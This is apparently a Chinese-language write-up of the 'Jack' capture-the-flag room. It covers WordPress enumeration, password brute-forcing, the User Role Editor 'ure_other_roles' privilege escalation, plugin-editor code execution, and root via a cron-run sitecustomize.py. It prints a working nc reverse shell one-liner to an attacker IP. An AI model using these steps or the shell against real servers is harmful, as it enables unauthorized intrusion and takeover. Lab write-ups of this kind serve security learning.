Jack
破坏运行Wordpress的Web服务器,获得低特权用户,并使用Python模块将您的权限升级到root。
端口扫描
循例nmap
web枚举
robots.txt
wpscan枚举user
wpscan直接爆
得到wendy的密码
直接登后台
根据题目提示,利用user role editor帮助我们在wp中提权到admin
根据exploitdb给出的desc
v4.25 之前的 WordPress User Role Editor 插件缺少授权检查其更新用户配置文件功能(“更新”功能,包含在“class-user-other-roles.php”模块中)。而不是验证当前用户是否有权编辑其他用户的配置文件(“edit_users”WP 功能),易受攻击的函数验证是否当前用户有权编辑指定的用户(“edit_user”WP 函数)提供的用户 ID(“user_id”变量/HTTP POST 参数)。 由于提供user id 是当前用户的 id,这个检查总是被绕过(即当前始终允许用户修改其配置文件)。此漏洞允许经过身份验证的用户添加任意用户角色编辑器通过“ure_other_roles”参数在其配置文件中指定角色对“profile.php”模块的 HTTP POST 请求(在“更新配置文件”被启用时发出)点击)。默认情况下,此模块授予指定的 WP 用户所有管理权限,存在于用户角色编辑器插件的上下文中。
进到profile editor,然后update
wp抓包添加ure_other_roles参数,放行
成功提权
直接往页面写一句话行不通
利用插件编辑器,随便编辑个插件
访问编辑的php文件:
http://jack.thm/wp-content/plugins/akismet/index.php
reverse shell payload
mkfifo /tmp/f1;nc 10.14.39.48 8888 < /tmp/f1 | /bin/bash > /tmp/f1
user flag
横向移动
备份文件,那么应该查看/var/backups
有一个ssh私钥,估计是jack的
下到攻击机尝试利用,没密码,成功进来
权限提升
查找用户可写的文件
sitecustomize.py是一个会在python运行的时候自动执行,我们查看了定时任务,并没有
那么有可能在进程列表中给出答案,传个pspy过去
定时执行python,这刚好满足了条件,编辑sitecustomize.py
静等一会
利用
getroot
